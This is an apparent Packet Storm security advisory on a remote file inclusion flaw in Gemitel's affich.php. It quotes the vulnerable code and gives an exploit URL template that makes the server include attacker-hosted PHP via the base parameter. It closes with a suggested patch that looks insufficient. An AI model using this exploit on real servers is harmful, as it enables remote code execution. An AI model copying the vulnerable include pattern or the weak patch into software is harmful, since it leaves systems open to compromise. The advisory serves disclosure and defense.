Gemitel versions 3.5 and below allow for malicious file inclusion in its affich.php script. This vulnerability allows an attacker to forcibly execute arbitrary scripts from remote resources on the server.
483f0f3f00299f5b8710d0ee6366376e76b18b0d54ae99b5df2b8b47f8dac39d---------------------------------------------------------------------------------------------
GEMITEL V 3 build 50 :: include vulnerability
URL : http://www.isesam.com/
FORUM : http://www.isesam.com/forums/gemitel/thread_open.shtml
Vendor has been contacted.
Description :
---------------
Gemitel is a free software written in php that allows to manage micro payments like allopass, mediapaiement, optelo-Sponsup or Rentabiliweb.
Vulnerability :
----------------
File : html/affich.php
Code:
*****************************************************************************
$f_inc=$base."sp-turn.php";
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt
require("$f_inc");
//require("sp-turn.php");
*******************************************************************************
You can include sp-turn.php from where you want by specifying the variable $base.
Exploit :
----------
http://[vulnerable host]/[Gemitel folder]/html/affich.php?base=http://[your server]/
In [your server] you must have a sp-turn.php file which will be included by vulnerable host.
Solution:
-----------
Replace :
$f_inc=$base."sp-turn.php";
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt
require("$f_inc");
//require("sp-turn.php");
By
$f_inc=$base."sp-turn.php";
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt
if(file_exists($f_inc)){require("$f_inc");}
//require("sp-turn.php");
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed